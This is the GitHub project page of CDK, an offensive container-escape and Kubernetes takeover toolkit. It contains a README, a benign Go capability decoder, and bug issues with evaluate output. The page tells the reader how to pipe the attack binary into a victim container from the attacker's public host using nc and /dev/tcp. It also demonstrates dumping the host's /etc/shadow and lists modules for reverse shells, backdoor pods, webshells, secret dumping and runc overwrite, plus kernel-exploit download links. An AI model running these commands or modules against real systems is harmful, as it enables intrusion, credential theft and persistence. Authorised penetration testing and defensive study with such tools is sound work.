
cdk's Introduction

CDK - Zero Dependency Container Penetration Toolkit


Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-source container penetration toolkit designed to offer stable exploitation in different slimmed-down containers without any OS dependency. It comes with useful network tools and many powerful PoCs/EXPs, and helps you escape the container and take over the K8s cluster easily.

Quick Start

Run cdk eva to gather evaluation info and a recommended exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Delivering CDK into the target container in real-world penetration testing

If you have an exploit that can upload a file, you can upload the CDK binary directly.

If you have an RCE exploit but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host the CDK binary on a machine of yours with a public IP:
     (on your host)
     nc -lvp 999 < cdk
  2. Inside the victim container, execute:
     cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
     chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of etcd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside the container to find potential weaknesses.
  2. Exploit: container escaping, persistence and lateral movement.
  3. Tool: network tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command runs the scripts below without local file scanning; use --full to enable all of them, including the file scan.

Tactic                 Script                                      Usage/Example
Information Gathering  OS Basic Info                               link
Information Gathering  Available Capabilities                      link
Information Gathering  Available Linux Commands                    link
Information Gathering  Mounts                                      link
Information Gathering  Net Namespace                               link
Information Gathering  Sensitive ENV                               link
Information Gathering  Sensitive Process                           link
Information Gathering  Sensitive Local Files                       link
Information Gathering  Kube-proxy Route Localnet (CVE-2020-8558)   link
Information Gathering  DNS-Based Service Discovery                 link
Discovery              K8s Api-server Info                         link
Discovery              K8s Service-account Info                    link
Discovery              Cloud Provider Metadata API                 link
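The Available Capabilities check decodes the CapEff mask from /proc/<pid>/status into names and flags the ones cdk eva warns about (SYS_ADMIN, SYS_MODULE, DAC_READ_SEARCH). As an added example, not CDK's own code: a Go decoder that does the same for a mask such as 0x00000000a80425fb, the default Docker set printed in the runc-pwn issue output further down this page; bit positions follow the kernel's include/uapi/linux/capability.h, and the risk wording is this example's own.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// capNames lists Linux capability names by bit position, following the
// kernel's include/uapi/linux/capability.h (CAP_CHOWN = 0 ... CAP_CHECKPOINT_RESTORE = 40).
var capNames = []string{
	"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
	"CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
	"CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
	"CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
	"CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
	"CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
	"CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
	"CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
	"CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
	"CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
	"CAP_CHECKPOINT_RESTORE",
}

// riskyCaps are capabilities that on their own give a container process a
// path to host resources; the wording is this example's, not cdk's.
var riskyCaps = map[string]string{
	"CAP_SYS_ADMIN":       "mount and cgroup control, effectively root on the host",
	"CAP_SYS_MODULE":      "can load code into the host kernel",
	"CAP_DAC_READ_SEARCH": "can read arbitrary host files",
	"CAP_SYS_PTRACE":      "can attach to other processes in a shared pid namespace",
	"CAP_SYS_RAWIO":       "raw access to block devices and memory",
}

// DecodeCaps turns a CapEff/CapPrm/CapBnd hex mask from /proc/<pid>/status
// into capability names, lowest bit first.
func DecodeCaps(hexMask string) ([]string, error) {
	mask, err := strconv.ParseUint(strings.TrimPrefix(hexMask, "0x"), 16, 64)
	if err != nil {
		return nil, fmt.Errorf("bad capability mask %q: %w", hexMask, err)
	}
	var names []string
	for bit := 0; bit < 64; bit++ {
		if mask>>uint(bit)&1 == 0 {
			continue
		}
		if bit < len(capNames) {
			names = append(names, capNames[bit])
		} else {
			names = append(names, fmt.Sprintf("CAP_%d", bit)) // newer than this table
		}
	}
	return names, nil
}

// Findings reports the risky capabilities present in the mask, in bit order.
func Findings(hexMask string) ([]string, error) {
	caps, err := DecodeCaps(hexMask)
	if err != nil {
		return nil, err
	}
	var out []string
	for _, c := range caps {
		if why, ok := riskyCaps[c]; ok {
			out = append(out, c+": "+why)
		}
	}
	return out, nil
}

// CapEffFromStatus pulls the CapEff mask out of /proc/<pid>/status content.
func CapEffFromStatus(status string) (string, bool) {
	for _, line := range strings.Split(status, "\n") {
		if strings.HasPrefix(line, "CapEff:") {
			return strings.TrimSpace(strings.TrimPrefix(line, "CapEff:")), true
		}
	}
	return "", false
}

func main() {
	// Constructed input: the default Docker capability set, as printed in the
	// runc-pwn issue output on this page. In a container, read /proc/self/status.
	const status = "Name:\tcdk\nCapEff:\t00000000a80425fb\n"
	mask, _ := CapEffFromStatus(status)
	caps, _ := DecodeCaps(mask)
	findings, _ := Findings(mask)
	fmt.Println("Cap decode:", "0x"+mask, "=", strings.Join(caps, ","))
	fmt.Println("risky:", findings)
}
```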

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
Tactic                Technique                                                   CDK Exploit Name         Doc
Escaping              docker-runc CVE-2019-5736                                   runc-pwn
Escaping              containerd-shim CVE-2020-15257                              shim-pwn                 link
Escaping              docker.sock PoC (DIND attack)                               docker-sock-check        link
Escaping              docker.sock RCE                                             docker-sock-pwn          link
Escaping              Docker API (2375) RCE                                       docker-api-pwn           link
Escaping              Device Mount Escaping                                       mount-disk               link
Escaping              LXCFS Escaping                                              lxcfs-rw                 link
Escaping              Cgroups Escaping                                            mount-cgroup             link
Escaping              Abuse Unprivileged User Namespace Escaping (CVE-2022-0492)  abuse-unpriv-userns      link
Escaping              Procfs Escaping                                             mount-procfs             link
Escaping              Ptrace Escaping PoC                                         check-ptrace             link
Escaping              Rewrite Cgroup (devices.allow)                              rewrite-cgroup-devices   link
Escaping              Read arbitrary file from host system (CAP_DAC_READ_SEARCH)  cap-dac-read-search      link
Discovery             K8s Component Probe                                         service-probe            link
Discovery             Dump Istio Sidecar Meta                                     istio-check              link
Discovery             Dump K8s Pod Security Policies                              k8s-psp-dump             link
Remote Control        Reverse Shell                                               reverse-shell            link
Remote Control        Kubelet Exec                                                kubelet-exec
Credential Access     Registry BruteForce                                         registry-brute           link
Credential Access     Access Key Scanning                                         ak-leakage               link
Credential Access     Etcd Get K8s Token                                          etcd-get-k8s-token
Credential Access     Dump K8s Secrets                                            k8s-secret-dump          link
Credential Access     Dump K8s Config                                             k8s-configmap-dump       link
Privilege Escalation  K8s RBAC Bypass                                             k8s-get-sa-token         link
Persistence           Deploy WebShell                                             webshell-deploy          link
Persistence           Deploy Backdoor Pod                                         k8s-backdoor-daemonset   link
Persistence           Deploy Shadow K8s api-server                                k8s-shadow-apiserver     link
Persistence           K8s MITM Attack (CVE-2020-8554)                             k8s-mitm-clusterip       link
Persistence           Deploy K8s CronJob                                          k8s-cronjob              link

Note about Thin: The thin release is intended for short-lived container shells such as serverless functions. We add build tags in the source code and cut a few exploits to make the binary lighter. The 2MB file contains 90% of CDK's functions; you can also pick useful exploits from the CDK source code to build your own lightweight binary.

Tool Module

These run like their Linux counterparts, with slightly different input arguments; see the usage links.

cdk nc [options]
cdk ps
Command   Description                              Usage/Example
nc        TCP Tunnel                               link
ps        Process Information                      link
netstat   Like the "netstat -antup" command
ifconfig  Network Information                      link
vi        Edit Files                               link
ectl      Unauthorized enumeration of etcd keys
kcurl     Request to K8s api-server                link
dcurl     Request to Docker HTTP API               link
ucurl     Request to Docker Unix Socket            link
rcurl     Request to Docker Registry API
probe     IP/Port Scanning                         link

Release Document

If you want to know how we release a new version, how the thin build is produced, why we provide upx versions, what the differences between the all, normal, thin and upx versions are, and how to choose specific CDK exploits and tools to compile your own release, please check the Release Document.

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

Thanks for the following contributors:

More contributors: Contributors List

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, the error message and the environment. Describe the exact steps that reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Include screenshots or logs of runs before and after your fix.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please provide a reproducible environment so we can review the contribution.
  • Include screenshots showing how the new feature works.
  • If you are committing a new evaluate/exploit script, please add a short doc to your PR message (here is an example).

Events

404StarLink 2.0 - Galaxy


Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam

WHC 2021 (Butian White Hat Conference)

KCON 2021 Arsenal

Kubernetes Community Days 2021

cdk's People

Contributors

404tk, alex-null, brant-ruan, dependabot[bot], dvkunion, fang-li, greenhandatsjtu, homelanmder, kingkaki, kmahyyg, neargle, nikitastupin, testwill, verctor, wall1e, wywwzjj, xyntax, yeahx


cdk's Issues

mountinfo array index out of range

Please describe the issue in detail

Note: Before submitting an issue, please check whether the CDK you are using is the latest version; some bugs have already been fixed in the latest version.

Additional Information

1. Full output of your execution of cdk evaluate --full

$ ./cdk evaluate --full

2. Please post the full error message, which can be command line output, software error message, screenshots, etc.

Attention: please post the full error message, not only the last line of the error!

[  Information Gathering - Mounts  ]
panic: runtime error: index out of range [2] with length 2

goroutine 1 [running]:
github.com/cdk-team/CDK/pkg/util.GetMountInfo(0x0, 0x0, 0x0, 0x0, 0x0)
        /home/runner/work/CDK/CDK/pkg/util/cgroup.go:113 +0x7f7
github.com/cdk-team/CDK/pkg/evaluate.MountEscape()
        /home/runner/work/CDK/CDK/pkg/evaluate/check_mount_escape.go:40 +0x28
github.com/cdk-team/CDK/pkg/evaluate.CallBasics()
        /home/runner/work/CDK/CDK/pkg/evaluate/evaluate.go:39 +0x94
github.com/cdk-team/CDK/pkg/cli.ParseCDKMain(0xa048070)
        /home/runner/work/CDK/CDK/pkg/cli/parse.go:75 +0x1b2
main.main()
        /home/runner/work/CDK/CDK/cmd/cdk/cdk.go:27 +0x1a

runc-pwn in the exploit module exits immediately

Problem description

Running the runc-pwn module prints "cannot find RunC process inside container, exit." and then exits directly; nothing happens and it just reports Finished.

The if check on line 87 returns from the function directly, so the target container has already stopped listening for the pid before the host gets a chance to run the exec command. When the host first creates the container, runc exits as soon as it finishes, so runc's pid cannot be obtained.

if found == -1 {
    fmt.Println("\tcannot find RunC process inside container, exit.")
    return
}

Additional Information

1. Output of cdk evaluate --full

$ ./cdk evaluate --full

CDK (Container DucK)
CDK Version(GitCommit):
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
2023/03/12 02:16:25 current dir: /
2023/03/12 02:16:25 current user: root uid: 0 gid: 0 home: /root
2023/03/12 02:16:25 hostname: 807f6b85cc1e
2023/03/12 02:16:25 debian ubuntu 18.04 kernel: 4.4.0-210-generic
2023/03/12 02:16:25 Setuid files found:
        /usr/bin/chfn
        /usr/bin/chsh
        /usr/bin/gpasswd
        /usr/bin/newgrp
        /usr/bin/passwd
        /bin/mount
        /bin/su
        /bin/umount

[  Information Gathering - Services  ]

[  Information Gathering - Commands and Capabilities  ]
2023/03/12 02:16:25 available commands:
        find,ps,apt,dpkg,mount,fdisk,base64,perl
2023/03/12 02:16:25 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
        CapInh: 00000000a80425fb
        CapPrm: 00000000a80425fb
        CapEff: 00000000a80425fb
        CapBnd: 00000000a80425fb
        CapAmb: 0000000000000000
        Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:41 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/YCLLF3QMOQWI6RXE5WOEML3MWH:/var/lib/docker/overlay2/l/T75S3NZRBNEIAZ6L3SOODUELSG:/var/lib/docker/overlay2/l/TQUPTPF5JE77BTN7SPW3C4EZ2C:/var/lib/docker/overlay2/l/HXM2EF5BE7N4OJVLYPMFSUAT2X,upperdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/diff,workdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/work
0:44 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:45 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:46 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:47 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:48 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:23 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd
0:25 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:26 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:27 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:28 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:29 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:30 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:31 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:32 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:33 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:34 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:43 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hostname /etc/hostname rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hosts /etc/hosts rw,relatime - ext4 /dev/vda1 rw,data=ordered
0:42 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:46 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:44 /bus /proc/bus ro,relatime - proc proc rw
0:44 /fs /proc/fs ro,relatime - proc proc rw
0:44 /irq /proc/irq ro,relatime - proc proc rw
0:44 /sys /proc/sys ro,relatime - proc proc rw
0:44 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:45 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:49 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:50 / /sys/firmware ro,relatime - tmpfs tmpfs ro

[  Information Gathering - Net Namespace  ]
        container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]
2023/03/12 02:16:25 net.ipv4.conf.all.route_localnet = 0

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 223.5.5.5:53: no such host
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 223.5.5.5:53: no such host

[  Discovery - K8s API Server  ]
2023/03/12 02:16:25 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
        api-server forbids anonymous request.
        response:

[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[  Discovery - Cloud Provider Metadata API  ]
2023/03/12 02:16:25 failed to dial Alibaba Cloud API.
2023/03/12 02:16:26 failed to dial Azure API.
2023/03/12 02:16:26 failed to dial Google Cloud API.
2023/03/12 02:16:26 failed to dial Tencent Cloud API.
        OpenStack Metadata API available in http://169.254.169.254/openstack/latest/meta_data.json
        Docs: https://docs.openstack.org/nova/rocky/user/metadata-service.html
        Amazon Web Services (AWS) Metadata API available in http://169.254.169.254/latest/meta-data/
        Docs: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html
2023/03/12 02:16:27 failed to dial ucloud API.

[  Exploit Pre - Kernel Exploits  ]
2023/03/12 02:16:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-27365] linux-iscsi

   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: less probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4997] target_offset

   Details: https://www.exploit-db.com/exploits/40049/
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
   Comments: ip_tables.ko needs to be loaded

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working



[  Information Gathering - Sensitive Files  ]
        .dockerenv - /.dockerenv
        /.bashrc - /etc/skel/.bashrc
        /.bashrc - /root/.bashrc

[  Information Gathering - ASLR  ]
2023/03/12 02:16:29 /proc/sys/kernel/randomize_va_space file content: 2
2023/03/12 02:16:29 ASLR is enabled.

[  Information Gathering - Cgroups  ]
2023/03/12 02:16:29 /proc/1/cgroup file content:
        11:pids:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        10:memory:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        9:cpuset:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        8:perf_event:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        7:hugetlb:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        6:cpu,cpuacct:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        5:net_cls,net_prio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        4:blkio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        3:devices:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        2:freezer:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
        1:name=systemd:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
2023/03/12 02:16:29 /proc/self/cgroup file added content (compare pid 1) :

2. Full error message

root@807f6b85cc1e:/# ./cdk run runc-pwn "echo 'hello,host' > /tmp/haha.escape"
2023/03/12 02:15:28 THIS EXPLOIT WILL OVERWRITE RUNC BINARY AND BREAK CI/CD, BACKUP YOUR RUNC BINARY FIRST!
2023/03/12 02:15:28 Shellcode will be trigger when an execve() call in container or the container is manually stopped.
